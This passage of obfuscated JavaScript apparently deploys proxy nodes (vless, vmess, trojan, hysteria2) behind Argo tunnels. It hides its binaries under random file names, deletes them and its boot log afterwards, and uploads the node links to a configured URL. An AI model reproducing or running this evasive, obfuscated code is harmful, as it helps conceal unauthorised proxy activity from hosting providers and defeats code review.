_0xe14257(_0x377857-_0x4c2f69._0xeff02f,_0x4b1154-0xa8,_0x4f771e,_0x4b1154-0xc);}let _0x39f02b='';for(let _0x57e9c3=0x7*-0x4d6+0x1867*-0x1+0x9*0x679;_0x23d078[_0x11deae(_0x302cc3._0x37774e,_0x302cc3._0xb5124d,0x33d,_0x302cc3._0x43d438)](_0x57e9c3,0x1fd7+0x2653+-0x1*0x4624);_0x57e9c3++){if(_0x23d078['QncfZ'](_0x23d078['uBAmP'],_0x11deae(_0x302cc3._0x54987e,0x363,_0x302cc3._0x37b270,_0x302cc3._0x4706f1)))_0x39f02b+=_0x43f550[_0x11deae(0x3e1,_0x302cc3._0x569e8f,_0x302cc3._0x5bb6a7,_0x302cc3._0x4e904b)](Math[_0x1f04e1(-0x2f7,-0x20f,-0x108,-_0x302cc3._0x2fe000)](_0x23d078[_0x1f04e1(-_0x302cc3._0x59455a,-_0x302cc3._0x5f3e7b,-_0x302cc3._0x52450d,-0x184)](Math['random'](),_0x43f550[_0x1f04e1(-_0x302cc3._0x71763e,-_0x302cc3._0x3937e5,-_0x302cc3._0x2820ed,-_0x302cc3._0x4ff915)])));else{const _0x56db41={_0xdd3013:0x1ec,_0x331461:0x22a,_0x4b9ce0:0xd4,_0x5a7240:0x6d,_0x4bdb4a:0x1e7,_0xcdf6e5:0xef,_0x2b2bad:0x145,_0x9c77ff:0xfc,_0x5b365c:0xb4,_0x1a00a4:0x9e,_0x1106ae:0xd6,_0x1cd38b:0x90,_0x21f08c:0x1a4,_0x449842:0x10b,_0x45691a:0x86,_0x3cdc8b:0x15d,_0x3763e6:0x14d,_0x45833f:0x2a,_0xb5bde8:0x18b,_0x6d3319:0x8d};_0x23d078[_0x1f04e1(-_0x302cc3._0x406f83,-0xf0,-_0x302cc3._0x14d5b5,0x74)](_0x3059d4,_0x34c310['join'](_0x233508,_0x1c9ff0)+_0x1f04e1(-0x119,-0x18c,-_0x302cc3._0x2a5c51,-_0x302cc3._0x22c54f),async(_0xaa4d3e,_0x3fd18d,_0x4fd8f5)=>{const _0x42ae2e={_0x1dd4cb:0x2f1},_0x3a24d2={_0x27468a:0x1ba,_0x3a7968:0xa,_0xc590ab:0x113};if(_0xaa4d3e){_0x4c65ac[_0x5ed05b(-_0x56db41._0xdd3013,0x3,-_0x56db41._0x331461,-0x12f)](_0x5ed05b(_0x56db41._0x4b9ce0,-_0x56db41._0x5a7240,_0x56db41._0x4bdb4a,_0x56db41._0xcdf6e5)+_0xaa4d3e['message']);return;}const _0x496d89=_0x3fd18d['match'](/PrivateKey:\s*(.*)/),_0x2e1721=_0x3fd18d[_0x5ed05b(-_0x56db41._0x2b2bad,-0x131,-0x1fa,-_0x56db41._0x9c77ff)](/PublicKey:\s*(.*)/);_0x58449b=_0x496d89?_0x496d89[-0xe1d+0x1c15+-0xdf7]:'',_0x549fe6=_0x2e1721?_0x2e1721[0x224+0x2*-0x6c9+0xb6f]:'';if(!_0x5d6489||!_0x537f68){_0x2b03e4['error'](_0x23d078['Tzfau']);return;}_0x43e96a['writeFileSync'](_0x5dd748,_0x5ed05b(_0x56db41._0x5b365c,_0x56db41._0x2b2bad,-_0x56db41._0x1a00a4,_0x56db41._0x1106ae)+_0x12fad4+_0x3ba4e2(-0x65,-0xc3,-_0x56db41._0x1cd38b,-_0x56db41._0x21f08c)+_0x50675c+'\x0a',_0x23d078[_0x3ba4e2(_0x56db41._0x449842,_0x56db41._0x45691a,_0x56db41._0x3cdc8b,_0x56db41._0x3763e6)]);function _0x3ba4e2(_0x2f42c3,_0x244b65,_0x190fd2,_0x509c53){return _0x1f04e1(_0x2f42c3-_0x3a24d2._0x27468a,_0x244b65- -_0x3a24d2._0x3a7968,_0x190fd2-_0x3a24d2._0xc590ab,_0x509c53);}function _0x5ed05b(_0xe080c5,_0x1b3457,_0x55d62a,_0x56de18){return _0x11deae(_0xe080c5-0x1ee,_0x1b3457-0x5f,_0x56de18- -_0x42ae2e._0x1dd4cb,_0x1b3457);}_0x2db6c0[_0x3ba4e2(_0x56db41._0x3763e6,_0x56db41._0x45833f,_0x56db41._0xb5bde8,0xf9)](_0x23d078[_0x3ba4e2(0x59,_0x56db41._0x6d3319,-0x38,-0x84)],_0x45f675),_0x2f6f92['log']('Public\x20Key:',_0x268e63),_0x23d078['YuZRq'](_0x15b2e5);});}}return _0x39f02b;}const npmRandomName=generateRandomName(),webRandomName=generateRandomName(),botRandomName=generateRandomName(),phpRandomName=generateRandomName();let npmPath=path[_0xe14257(-0x32,0x6b,-0xab,-0x5)](FILE_PATH,npmRandomName),phpPath=path[_0x33ccd3(0x61f,0x723,0x757,0x5f7)](FILE_PATH,phpRandomName),webPath=path['join'](FILE_PATH,webRandomName),botPath=path[_0x33ccd3(0x601,0x723,0x792,0x843)](FILE_PATH,botRandomName),subPath=path[_0xe14257(-0x94,0xaf,-0x15c,-0x5)](FILE_PATH,_0x33ccd3(0x668,0x6fb,0x786,0x810)),listPath=path['join'](FILE_PATH,_0xe14257(0x107,0x93,0x63,0x62)),bootLogPath=path[_0xe14257(0x12b,0xdf,-0x119,-0x5)](FILE_PATH,_0x33ccd3(0x46c,0x58e,0x55d,0x593)),configPath=path[_0xe14257(-0x2b,0x123,-0x83,-0x5)](FILE_PATH,_0x33ccd3(0x616,0x77c,0x88a,0x866));function deleteNodes(){const _0x1447e9={_0x134eac:0x12d,_0x455df6:0x4b,_0xabb9bc:0xd8,_0xa845b3:0xc,_0x2e23dd:0x122,_0x3d0c89:0xeb,_0x5c7c01:0x86,_0x16aec3:0x1bb,_0x3bb844:0xdc,_0x13b094:0x1f,_0x5e3e18:0xf0,_0x5bcab4:0x19a,_0x5c81c9:0xd9,_0xa35408:0x78,_0x1560f1:0xf0,_0xa93576:0x1f4,_0x198adf:0x1e,_0x287180:0x90,_0x5025ed:0x121,_0x350423:0x20f,_0x5281a3:0x3,_0x54f329:0x196,_0x579166:0x14b,_0x114833:0x257,_0x5513a3:0xcd,_0x35b3ca:0x7c,_0x5643c0:0xa6,_0x27ebf5:0x17c,_0xed5f8e:0xc7,_0x50db9d:0x10,_0x3db005:0x22f,_0x34b001:0x100,_0x1e9d8a:0x141,_0x497eb5:0x45,_0x16803c:0x4d,_0x116e11:0x65,_0x4775af:0x296,_0x220451:0x177,_0x44dbb8:0xee,_0x95903b:0xb4,_0x3b291b:0x1b,_0x45c93e:0x10b,_0x35a342:0xc3,_0x34efa6:0x118,_0x314d08:0x26b,_0x19de41:0x6e,_0x4a77cb:0xbe,_0x48590d:0x48,_0x1e5def:0x1e7,_0x152716:0x11,_0x87bdfe:0xd,_0x1d33cc:0x4f,_0x4f8523:0x95,_0x545c95:0x151,_0x5c65b1:0xe0,_0x3b9f2c:0x32b,_0x4845a1:0x210,_0x249f17:0xa8,_0x28384b:0xd0,_0x18bdf1:0xde,_0xaccb52:0x11a,_0x1c5699:0xc6,_0x1fbb73:0x14b,_0x5722a7:0x1f,_0x701d5a:0x34,_0x4061f0:0x1c9,_0x5bf965:0x2b6,_0x3c967:0x89,_0x458651:0x25f,_0x3c0e95:0xa0,_0x53745e:0x68,_0x17082d:0x32,_0x3654c9:0xc5,_0xf644dd:0xba,_0xf847d9:0x74,_0x8a247f:0x110,_0x16580d:0x1de,_0x36b0bd:0x136,_0x325d40:0x204,_0x3ac35a:0x215,_0x32d967:0x1d,_0x3abae2:0x18f,_0x4e6256:0x125,_0x59d2ab:0x6d,_0x3ff9b1:0x100,_0x3d9a5b:0x31d,_0x4d3bc9:0x2ca,_0x55d6ef:0xe8,_0x169fd2:0x1f,_0x417c17:0x124,_0xf2df87:0x125,_0x806edb:0x139,_0x559a07:0x97,_0x59abff:0x10,_0x1010a1:0x83,_0x1c377b:0x175,_0x3fab1e:0x43,_0xbc10fa:0x1aa,_0x25c8be:0x11b,_0x3f8429:0x306,_0x594310:0x2e9,_0xe493a8:0x10f,_0x448e54:0x5e,_0x2575fb:0x13,_0x509ce9:0x57,_0xa98bcd:0x30},_0x3f5702={_0x402ce6:0x189,_0x200b02:0x6b},_0xce8c14={_0x5ef991:0x80,_0x12689e:0x135,_0x145149:0x14e},_0x48984c={};_0x48984c[_0x28ca72(-_0x1447e9._0x134eac,-_0x1447e9._0x455df6,-_0x1447e9._0xabb9bc,_0x1447e9._0xa845b3)]=_0x56350c(-_0x1447e9._0x2e23dd,_0x1447e9._0x3d0c89,-_0x1447e9._0x5c7c01,-_0x1447e9._0x16aec3),_0x48984c[_0x28ca72(-_0x1447e9._0x3bb844,-_0x1447e9._0x13b094,-0x11e,0xc6)]=function(_0x24eb29,_0x3dedc3){return _0x24eb29===_0x3dedc3;},_0x48984c[_0x56350c(-_0x1447e9._0x5e3e18,-_0x1447e9._0x5bcab4,-_0x1447e9._0x5c81c9,_0x1447e9._0xa35408)]=_0x28ca72(-0x246,-_0x1447e9._0x1560f1,0x5,-_0x1447e9._0xa93576),_0x48984c[_0x28ca72(_0x1447e9._0x198adf,-_0x1447e9._0x287180,-0x1c7,0x40)]=_0x28ca72(_0x1447e9._0x16aec3,_0x1447e9._0x5025ed,_0x1447e9._0x350423,_0x1447e9._0x5281a3),_0x48984c[_0x56350c(-0x108,-_0x1447e9._0x54f329,-_0x1447e9._0x579166,-_0x1447e9._0x114833)]=_0x28ca72(-0x2a,_0x1447e9._0x5513a3,_0x1447e9._0x35b3ca,-_0x1447e9._0x5643c0),_0x48984c[_0x56350c(_0x1447e9._0x27ebf5,_0x1447e9._0xed5f8e,_0x1447e9._0x50db9d,-0x43)]=_0x56350c(-_0x1447e9._0x3db005,-_0x1447e9._0x34b001,-_0x1447e9._0x1e9d8a,-_0x1447e9._0x497eb5);function _0x28ca72(_0x5a4842,_0x4e2c8e,_0x1c4aed,_0x315769){return _0xe14257(_0x5a4842-_0xce8c14._0x5ef991,_0x4e2c8e-_0xce8c14._0x12689e,_0x1c4aed,_0x4e2c8e-_0xce8c14._0x145149);}_0x48984c[_0x56350c(-0x19c,-0x22,-_0x1447e9._0x16803c,_0x1447e9._0x116e11)]=_0x56350c(-0x26c,-_0x1447e9._0x4775af,-_0x1447e9._0x220451,-0x21),_0x48984c[_0x56350c(-_0x1447e9._0x44dbb8,_0x1447e9._0x95903b,-_0x1447e9._0x3b291b,_0x1447e9._0x45c93e)]=_0x56350c(-0x12e,-_0x1447e9._0x35a342,-_0x1447e9._0x34efa6,-_0x1447e9._0x314d08),_0x48984c[_0x28ca72(-_0x1447e9._0x19de41,_0x1447e9._0x4a77cb,_0x1447e9._0x48590d,_0x1447e9._0x1e5def)]=_0x28ca72(-0xb9,-_0x1447e9._0x152716,-_0x1447e9._0x87bdfe,_0x1447e9._0x1d33cc);const _0x24f228=_0x48984c;function _0x56350c(_0x391c30,_0x50a28f,_0x1f81d7,_0x48d836){return _0xe14257(_0x391c30-0x153,_0x50a28f-_0x3f5702._0x402ce6,_0x391c30,_0x1f81d7- -_0x3f5702._0x200b02);}try{if(_0x24f228['ETZcr'](_0x24f228['ubBoz'],_0x24f228['ubBoz'])){if(!UPLOAD_URL)return;const _0x4859d6=path[_0x56350c(-_0x1447e9._0x4f8523,-_0x1447e9._0x545c95,-0x70,-0x1b2)](FILE_PATH,_0x24f228[_0x56350c(-_0x1447e9._0x5c65b1,-_0x1447e9._0x3b9f2c,-0x249,-_0x1447e9._0x4845a1)]);if(!fs[_0x56350c(0xe6,-_0x1447e9._0x249f17,0x39,0x130)](_0x4859d6))return;let _0x44609d;try{_0x44609d=fs[_0x56350c(-0x132,_0x1447e9._0x28384b,-_0x1447e9._0x497eb5,_0x1447e9._0x18bdf1)](_0x4859d6,_0x24f228[_0x56350c(-_0x1447e9._0xaccb52,-_0x1447e9._0x1c5699,-_0x1447e9._0x1fbb73,-0x125)]);}catch{if(_0x24f228[_0x28ca72(0x61,-_0x1447e9._0x5722a7,0x123,_0x1447e9._0x701d5a)](_0x24f228[_0x28ca72(0xc0,_0x1447e9._0x4061f0,0x1fd,_0x1447e9._0x3b9f2c)],_0x24f228['pYqZo'])){const _0x9bb907=_0x28ca72(_0x1447e9._0x5bf965,0x186,_0x1447e9._0x3c967,_0x1447e9._0x458651)+_0x1d802a+_0x28ca72(-0x7b,-_0x1447e9._0x3c0e95,-0x193,_0x1447e9._0x53745e)+_0x3aeca7+_0x28ca72(-_0x1447e9._0x17082d,_0x1447e9._0x3654c9,-0x5f,0xf9)+_0x17abf5+_0x28ca72(-0x69,_0x1447e9._0xf644dd,_0x1447e9._0xf847d9,-0x80)+_0x535d35;_0x4264f0[_0x56350c(-_0x1447e9._0x8a247f,-_0x1447e9._0x16580d,-0xcb,-_0x1447e9._0x13b094)](_0x29037e['join'](_0xc43a1c,_0x24f228[_0x56350c(-_0x1447e9._0x36b0bd,-0x314,-_0x1447e9._0x325d40,-_0x1447e9._0x4f8523)]),_0x9bb907);}else return null;}const _0x53c815=Buffer['from'](_0x44609d,_0x24f228['hBgDc'])[_0x28ca72(0x188,_0x1447e9._0xed5f8e,_0x1447e9._0x116e11,_0x1447e9._0x3ac35a)](_0x24f228['kGYvm']),_0x6364c2=_0x53c815[_0x56350c(-_0x1447e9._0x32d967,-_0x1447e9._0x3abae2,-_0x1447e9._0x4e6256,-_0x1447e9._0x59d2ab)]('\x0a')[_0x56350c(-_0x1447e9._0x3ff9b1,-_0x1447e9._0x3d9a5b,-0x265,-_0x1447e9._0x4d3bc9)](_0x54ff5d=>/(vless|vmess|trojan|hysteria2|tuic):\/\//[_0x28ca72(0x79,-0x56,-0x38,-0x1b6)](_0x54ff5d));if(_0x24f228[_0x28ca72(-_0x1447e9._0x55d6ef,-_0x1447e9._0x169fd2,_0x1447e9._0x417c17,_0x1447e9._0xf2df87)](_0x6364c2[_0x28ca72(-_0x1447e9._0x28384b,-_0x1447e9._0x198adf,_0x1447e9._0x806edb,0x129)],-0x56*0x24+-0x329*-0x5+-0x3b5))return;const _0x94577f={};_0x94577f['nodes']=_0x6364c2;const _0x26602b={};_0x26602b['Content-Type']=_0x24f228[_0x56350c(-_0x1447e9._0x559a07,-0x1ee,-0xfb,-_0x1447e9._0x59abff)];const _0x549ad3={};return _0x549ad3[_0x56350c(-0x55,-_0x1447e9._0x1010a1,-_0x1447e9._0x1c377b,-_0x1447e9._0x3fab1e)]=_0x26602b,axios['post'](UPLOAD_URL+_0x28ca72(_0x1447e9._0xbc10fa,0xd9,_0x1447e9._0x25c8be,0x11d),JSON['stringify'](_0x94577f),_0x549ad3)[_0x56350c(-_0x1447e9._0x3f8429,-_0x1447e9._0x594310,-0x222,-_0x1447e9._0xe493a8)](_0xc23309=>{return null;});}else{const _0x1b5c50=_0x13b8c5['join'](_0x16788f,_0x169fdd);_0x59a175[_0x56350c(_0x1447e9._0x448e54,-_0x1447e9._0x2575fb,-_0x1447e9._0x509ce9,_0x1447e9._0xa98bcd)](_0x1b5c50,()=>{});}}catch(_0x49dad3){return null;}}function _0xe14257(_0x3786ac,_0x4872a4,_0x442a1d,_0x2a79de){const _0x40f8a5={_0x24ef9d:0x353};return _0x325c(_0x2a79de- -_0x40f8a5._0x24ef9d,_0x442a1d);}function isValidPort(_0x126b4b){const _0x433133={_0x33eebb:0x249,_0x5f2aa9:0x2e2,_0xd979e8:0x2a5,_0x48b4d4:0x146,_0x101056:0xd9,_0x3e6878:0x167,_0x5110c5:0x1e6,_0x4531a6:0x264,_0x43fb24:0x130,_0x2a0a1b:0x158,_0x1719d4:0x20e,_0x4a458f:0x29c,_0x215b16:0x104,_0x1b30c0:0x2e8,_0x449717:0x1a7,_0x4a8e69:0x278,_0x1b9b63:0x145,_0x4ba3e3:0x10e,_0x34bb72:0x17f,_0x414014:0x349,_0x4b5304:0x8c,_0xf464e4:0x30f,_0x3f6b0e:0x16b,_0x2c8036:0x1c1,_0x59e795:0x5c,_0x11de54:0x297,_0xa69ac9:0x1d9,_0x19b5e0:0x234,_0x21dccd:0x12,_0x497ede:0x282,_0x548ea7:0x110,_0x460c35:0x302,_0x853cb:0x25b,_0x230de5:0x62,_0x15b754:0x294,_0x26bad7:0x160,_0x13fbc1:0x13b,_0x204086:0x119,_0x497696:0x15,_0x41584e:0x2de,_0x2d488f:0xfe,_0x3c0532:0x253,_0x5178aa:0x34a,_0x4daf79:0x208,_0x5d710a:0x35a,_0x5fc41a:0x154,_0x4bcbe7:0x39a,_0x58f623:0x45d,_0x2bb4d4:0x2df},_0x3c7569={_0xc56452:0x1a6,_0x130209:0xfa,_0x4d4c2f:0x89},_0x37813e={_0x54b96b:0xae,_0x5896a7:0x18};function _0xeefbbc(_0x1205a2,_0x51e17f,_0x2ceb23,_0x250333){return _0xe14257(_0x1205a2-_0x37813e._0x54b96b,_0x51e17f-_0x37813e._0x5896a7,_0x250333,_0x51e17f-0x310);}const _0x341fc0={'iDKaI':function(_0x317874,_0x139cda){return _0x317874!==_0x139cda;},'fMGjg':_0x13b0d0(-_0x433133._0x33eebb,-_0x433133._0x5f2aa9,-_0x433133._0xd979e8,-0x24f),'xaDoQ':function(_0x51c319,_0x2f3848){return _0x51c319===_0x2f3848;},'glEET':function(_0x29035c,_0x3643f1){return _0x29035c===_0x3643f1;},'AgrMf':_0xeefbbc(_0x433133._0x48b4d4,0x22c,_0x433133._0x101056,_0x433133._0x3e6878),'IpDfE':function(_0x40976c,_0x22d2fa){return _0x40976c===_0x22d2fa;},'AcPQY':function(_0x33f79d,_0x2eb90a){return _0x33f79d(_0x2eb90a);},'PeVLI':function(_0x11bdb5,_0x5f50e){return _0x11bdb5>_0x5f50e;},'FkoGH':function(_0x19e89e,_0x1f5a8e){return _0x19e89e===_0x1f5a8e;},'ykKuV':_0xeefbbc(_0x433133._0x5110c5,_0x433133._0x4531a6,0x3ba,_0x433133._0x43fb24),'MHPAw':_0xeefbbc(_0x433133._0x2a0a1b,_0x433133._0x1719d4,_0x433133._0x4a458f,0xb1)};function _0x13b0d0(_0x4c24c5,_0x2a7633,_0x28e18c,_0x20a3d2){return _0xe14257(_0x4c24c5-_0x3c7569._0xc56452,_0x2a7633-_0x3c7569._0x130209,_0x28e18c,_0x20a3d2- -_0x3c7569._0x4d4c2f);}try{if(_0x341fc0[_0x13b0d0(-0x1d1,-_0x433133._0x5f2aa9,-0x207,-0x1de)](_0x341fc0['fMGjg'],_0x341fc0[_0x13b0d0(-_0x433133._0x215b16,-0x18e,-_0x433133._0x1b30c0,-_0x433133._0x449717)])){const _0x31cf49=_0x1963c4[_0x13b0d0(-_0x433133._0x4a8e69,-_0x433133._0x1b9b63,-_0x433133._0x4ba3e3,-0x24d)][_0xeefbbc(_0x433133._0x34bb72,0x240,_0x433133._0x414014,0x28f)][_0x13b0d0(-0x16a,-_0x433133._0x4b5304,-_0x433133._0xf464e4,-0x1d8)](_0x5c72b1),_0x348fdb=_0x226453[_0x181099],_0xd531f0=_0x266bf0[_0x348fdb]||_0x31cf49;_0x31cf49['__proto__']=_0x24501a[_0xeefbbc(_0x433133._0x3f6b0e,_0x433133._0x2c8036,_0x433133._0x59e795,_0x433133._0xf464e4)](_0x3f284b),_0x31cf49[_0xeefbbc(_0x433133._0x11de54,0x289,_0x433133._0xa69ac9,_0x433133._0x19b5e0)]=_0xd531f0[_0x13b0d0(-_0x433133._0x21dccd,0x53,-_0x433133._0x497ede,-_0x433133._0x548ea7)][_0x13b0d0(-_0x433133._0x460c35,-_0x433133._0x3e6878,-0x345,-0x1d8)](_0xd531f0),_0x56ae39[_0x348fdb]=_0x31cf49;}else{if(_0x126b4b===null||_0x341fc0[_0x13b0d0(-_0x433133._0x853cb,-_0x433133._0x230de5,-_0x433133._0x15b754,-_0x433133._0x26bad7)](_0x126b4b,undefined)||_0x126b4b==='')return![];if(_0x341fc0['glEET'](typeof _0x126b4b,_0x341fc0['AgrMf'])&&_0x341fc0['IpDfE'](_0x126b4b[_0x13b0d0(0x27,-_0x433133._0x13fbc1,_0x433133._0x204086,_0x433133._0x497696)](),''))return![];const _0x381ad1=_0x341fc0[_0x13b0d0(-_0x433133._0x41584e,-_0x433133._0x2d488f,-0x158,-_0x433133._0x3c0532)](parseInt,_0x126b4b);if(isNaN(_0x381ad1))return![];if(_0x381ad1<0xa8+-0x2*0xaf3+0x153f||_0x341fc0[_0xeefbbc(0xe1,0x184,_0x433133._0x33eebb,0x21a)](_0x381ad1,0x1655f+0x74e5+-0xda45))return![];return!![];}}catch(_0x1d9489){if(_0x341fc0[_0xeefbbc(_0x433133._0x5178aa,_0x433133._0x4daf79,_0x433133._0x5d710a,_0x433133._0x5fc41a)](_0x341fc0['ykKuV'],_0x341fc0[_0xeefbbc(_0x433133._0x33eebb,_0x433133._0x4bcbe7,_0x433133._0x58f623,_0x433133._0x2bb4d4)]))_0x415f07(_0x3138b0);else return![];}}const pathsToDelete=[webRandomName,botRandomName,npmRandomName,'boot.log',_0x33ccd3(0x640,0x78a,0x896,0x732)];function cleanupOldFiles(){const _0x94701b={_0x4ece84:0x64c,_0x42eb0f:0x5fb,_0x315f8a:0x734,_0x37ad3a:0x560},_0x1481b4={_0x59488d:0x2a4,_0x1dadfe:0x256,_0x3c8f02:0x1a6,_0xf8c3ec:0x1f3},_0x1ae3b={_0x52d240:0x13b,_0x5e507e:0x37b,_0x124e81:0x64},_0x40c350={_0x599909:0x168,_0x448153:0x4e,_0x115fb6:0x624};function _0x131da7(_0x4b7e49,_0x244e8e,_0x5667d9,_0x7c37ca){return _0xe14257(_0x4b7e49-_0x40c350._0x599909,_0x244e8e-_0x40c350._0x448153,_0x5667d9,_0x244e8e-_0x40c350._0x115fb6);}pathsToDelete[_0x131da7(_0x94701b._0x4ece84,_0x94701b._0x42eb0f,_0x94701b._0x315f8a,_0x94701b._0x37ad3a)](_0x17237b=>{const _0xd065e1=path[_0x3dd547(_0x1481b4._0x59488d,_0x1481b4._0x1dadfe,_0x1481b4._0x3c8f02,_0x1481b4._0xf8c3ec)](FILE_PATH,_0x17237b);function _0x3dd547(_0x439f7a,_0x3ebb7c,_0x1f7d0c,_0x2a1aca){return _0x131da7(_0x439f7a-_0x1ae3b._0x52d240,_0x439f7a- -_0x1ae3b._0x5e507e,_0x2a1aca,_0x2a1aca-_0x1ae3b._0x124e81);}fs['unlink'](_0xd065e1,()=>{});});}app[_0x33ccd3(0x67c,0x532,0x524,0x61b)]('/',function(_0x4a6158,_0x25114f){const _0x418b75={_0x246203:0x47,_0x196b01:0x91,_0x1fa5e4:0x156,_0xf676a6:0xf7,_0x147d59:0x3b,_0x2ebc0b:0x95,_0x5a5e28:0xa1,_0x44fb75:0xdf,_0x285389:0xd0},_0x166a87={_0xa9ed10:0xa5,_0x466845:0x2c,_0x540646:0x43},_0x2ba1f7={_0x50c434:0x5bf,_0x3d72c1:0x51},_0x274357={};_0x274357[_0x5588e6(0x8e,-0x105,-_0x418b75._0x246203,-_0x418b75._0x196b01)]=_0x5588e6(0x88,_0x418b75._0x1fa5e4,-_0x418b75._0xf676a6,_0x418b75._0x147d59);function _0x1962f1(_0x2cb5e1,_0x78a438,_0x407a14,_0x19436d){return _0x33ccd3(_0x2cb5e1-0x1ed,_0x2cb5e1- -_0x2ba1f7._0x50c434,_0x407a14-_0x2ba1f7._0x3d72c1,_0x19436d);}const _0x5eb7e4=_0x274357;function _0x5588e6(_0x5dd079,_0x44f41f,_0x399d4b,_0xfcfb8e){return _0xe14257(_0x5dd079-_0x166a87._0xa9ed10,_0x44f41f-_0x166a87._0x466845,_0x399d4b,_0xfcfb8e-_0x166a87._0x540646);}_0x25114f['send'](_0x5eb7e4[_0x1962f1(_0x418b75._0x2ebc0b,_0x418b75._0x5a5e28,_0x418b75._0x44fb75,-_0x418b75._0x285389)]);});function argoType(){const _0x467bc4={_0x1728a4:0x16d,_0x1b9ff8:0x15a,_0x47d31b:0x143,_0x473c98:0x163,_0x38092e:0xc8,_0x5d1fda:0x15e,_0xa58e99:0x41,_0x1c4a93:0xb9,_0x386b80:0x38,_0x2fde77:0x14d,_0x437365:0x207,_0x19067b:0x22,_0x14eddb:0x1,_0x40cf22:0x159,_0x2a1a77:0x37c,_0x1cb19e:0xc1,_0x2f5235:0x225,_0x4b4563:0x116,_0x4bd0f8:0x2ed,_0x662249:0x512,_0x4dca84:0x53f,_0x1355a7:0x25b,_0x13a9e5:0x28e,_0x17ed67:0x23a,_0x434596:0xa2,_0x52009c:0x74,_0x5d0037:0xca,_0x433643:0x169,_0x3939c4:0x220,_0x32e2fd:0x2d2,_0x4e1e5f:0x103,_0x2acbb8:0x1a8,_0x85231d:0x34f,_0x348027:0x27b,_0x37a460:0x297,_0x26dcd0:0x346,_0x5aba1a:0x33d,_0x7911ab:0xe3,_0x483190:0xdb,_0x1ece39:0x10,_0x3de698:0x136,_0x1f7bc8:0xbf,_0x43c0c5:0x162,_0xe61220:0x337,_0x47d964:0x1b2,_0x1f1797:0x30b,_0x16e171:0x360,_0x51449a:0xc5,_0x2bf6ec:0x219,_0x25035f:0x26,_0x5552e4:0xf,_0x2fceaf:0x152,_0x508b88:0x176,_0x17fea4:0x6f,_0x474d07:0x1a1,_0x265cc6:0x2fc,_0x12740f:0x74,_0x56447d:0x1ef,_0x46059d:0x26a,_0x3cb9cc:0x203,_0x50977e:0x138,_0x5d5d90:0x330,_0x46cdd9:0x365,_0x5f5055:0x50a,_0xee87e7:0x2c6,_0xb2d5e8:0x3c0,_0xacd957:0x289,_0x4bdc82:0x2c4,_0x19fea9:0x20f,_0x2edacd:0x10f,_0x42c2d3:0x450,_0x2c9749:0x535,_0x2b8cc2:0x4b6,_0x37f787:0x279,_0x2d609a:0x3e4,_0x46298d:0x3ad},_0x424ed3={_0xedb412:0x13d},_0x246926={_0x445692:0xa2,_0x4c7f04:0x163};function _0xf9bf3c(_0x8e09f0,_0x21b497,_0x58ea3b,_0x29547e){return _0x33ccd3(_0x8e09f0-_0x246926._0x445692,_0x29547e- -0x363,_0x58ea3b-_0x246926._0x4c7f04,_0x58ea3b);}const _0x2c3202={};_0x2c3202['edWtW']=function(_0x34351b,_0x290592){return _0x34351b||_0x290592;},_0x2c3202['VqRhC']='ARGO_DOMAIN\x20or\x20ARGO_AUTH\x20variable\x20is\x20empty,\x20use\x20quick\x20tunnels',_0x2c3202[_0xf9ccf4(0x14e,_0x467bc4._0x1728a4,0x74,0x1e9)]=_0xf9ccf4(-_0x467bc4._0x1b9ff8,-_0x467bc4._0x47d31b,-_0x467bc4._0x473c98,-_0x467bc4._0x38092e),_0x2c3202['hkXsk']=_0xf9ccf4(-_0x467bc4._0x5d1fda,_0x467bc4._0xa58e99,-_0x467bc4._0x1c4a93,_0x467bc4._0x386b80),_0x2c3202['hBNmO']=_0xf9bf3c(0x20c,0x1cc,_0x467bc4._0x2fde77,_0x467bc4._0x437365),_0x2c3202['ECviK']=_0xf9ccf4(_0x467bc4._0x19067b,0xd6,-_0x467bc4._0x14eddb,-_0x467bc4._0x40cf22);const _0x4b3f5c=_0x2c3202;if(_0x4b3f5c[_0xf9ccf4(-_0x467bc4._0x2a1a77,-_0x467bc4._0x1cb19e,-_0x467bc4._0x2f5235,-_0x467bc4._0x4b4563)](!ARGO_AUTH,!ARGO_DOMAIN)){console[_0xf9bf3c(_0x467bc4._0x4bd0f8,_0x467bc4._0x662249,_0x467bc4._0x4dca84,0x3ed)](_0x4b3f5c[_0xf9bf3c(_0x467bc4._0x1355a7,_0x467bc4._0x13a9e5,_0x467bc4._0x17ed67,0x2a0)]);return;}function _0xf9ccf4(_0xac5a47,_0x5505a6,_0x2366ed,_0x3f1205){return _0x33ccd3(_0xac5a47-0x1a8,_0x2366ed- -0x733,_0x2366ed-_0x424ed3._0xedb412,_0xac5a47);}if(ARGO_AUTH['includes'](_0x4b3f5c[_0xf9ccf4(0x27,_0x467bc4._0x434596,_0x467bc4._0x52009c,-_0x467bc4._0x5d0037)])){if(_0x4b3f5c[_0xf9bf3c(_0x467bc4._0x433643,_0x467bc4._0x3939c4,0x164,_0x467bc4._0x32e2fd)]!==_0x4b3f5c[_0xf9ccf4(-_0x467bc4._0x4e1e5f,-0x26a,-0xfe,-_0x467bc4._0x2acbb8)]){const _0x2a64de=_0xf9bf3c(_0x467bc4._0x85231d,_0x467bc4._0x348027,_0x467bc4._0x37a460,_0x467bc4._0x26dcd0)+_0x411735+'@'+_0x48fd7c+':'+_0x1f47ab+'/?sni=www.bing.com&insecure=1&alpn=h3&obfs=none#'+_0x2d7906;_0x22541f+=_0x2a64de;}else{fs[_0xf9bf3c(0x31e,_0x467bc4._0x17ed67,_0x467bc4._0x5aba1a,0x365)](path[_0xf9ccf4(_0x467bc4._0x7911ab,-_0x467bc4._0x483190,-_0x467bc4._0x1ece39,-_0x467bc4._0x3de698)](FILE_PATH,'tunnel.json'),ARGO_AUTH);const _0x3e0429=_0xf9ccf4(-_0x467bc4._0x1f7bc8,-_0x467bc4._0x43c0c5,-_0x467bc4._0x7911ab,-0x108)+ARGO_AUTH[_0xf9bf3c(_0x467bc4._0xe61220,0x308,_0x467bc4._0x47d964,_0x467bc4._0x1f1797)]('\x22')[0x16a5+0x219*-0x1+-0xb5*0x1d]+_0xf9bf3c(0x24d,_0x467bc4._0x16e171,_0x467bc4._0x51449a,_0x467bc4._0x2bf6ec)+path['join'](FILE_PATH,_0x4b3f5c[_0xf9ccf4(-_0x467bc4._0x25035f,0x7d,_0x467bc4._0x5552e4,_0x467bc4._0x2fceaf)])+_0xf9ccf4(-_0x467bc4._0x508b88,-_0x467bc4._0x7911ab,-_0x467bc4._0x17fea4,0x34)+ARGO_DOMAIN+_0xf9ccf4(-_0x467bc4._0x474d07,-_0x467bc4._0x265cc6,-0x1ba,-_0x467bc4._0x12740f)+ARGO_PORT+_0xf9ccf4(-_0x467bc4._0x56447d,-_0x467bc4._0x46059d,-_0x467bc4._0x3cb